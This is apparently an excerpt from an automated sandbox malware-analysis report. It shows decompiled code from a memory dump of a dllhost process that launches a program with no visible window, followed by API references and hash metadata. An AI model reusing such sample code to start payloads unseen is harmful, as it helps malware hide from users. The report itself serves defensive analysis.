                                                				struct _STARTUPINFOW _v96;
                                                				void* _t19;
                                                				WCHAR* _t20;
                                                
                                                				_t20 = __ecx;
                                                				E02873440(_t19,  &_v96, 0, 0x44);
                                                				_v96.cb = 0x44;
                                                				_v96.dwFlags = 1;
                                                				_v96.wShowWindow = 5;
                                                				asm("xorps xmm0, xmm0");
                                                				asm("movups [ebp-0x14], xmm0");
                                                				if(CreateProcessW(0, _t20, 0, 0, 0, 0x8000000, 0, 0,  &_v96,  &_v24) == 0) {
                                                					return 0;
                                                				} else {
                                                					WaitForSingleObject(_v24, 0);
                                                					return 1;
                                                				}
                                                			}








                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,?,745EC0B0), ref: 0286A384
                                                • WaitForSingleObject.KERNEL32(?,00000000,?,745EC0B0), ref: 0286A393
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CreateObjectProcessSingleWait
                                                • String ID: D
                                                • API String ID: 623904672-2746444292
                                                • Opcode ID: 8e8abdbc90bd27a12dc80e31c659ff32ce3c016389aa8b299976c87b47278f1b
                                                • Instruction ID: ef371bf7432862319054b94e7aeee9f4748f0a02afa32322714ba0764af86ec3
                                                • Opcode Fuzzy Hash: 8e8abdbc90bd27a12dc80e31c659ff32ce3c016389aa8b299976c87b47278f1b
                                                • Instruction Fuzzy Hash: 2701FE35EC020C7AEB10DA95DC46FEFB76CEB04704F204126FA18BA1C0E6B164148BA6
                                                Uniqueness

                                                Uniqueness Score: -1.00%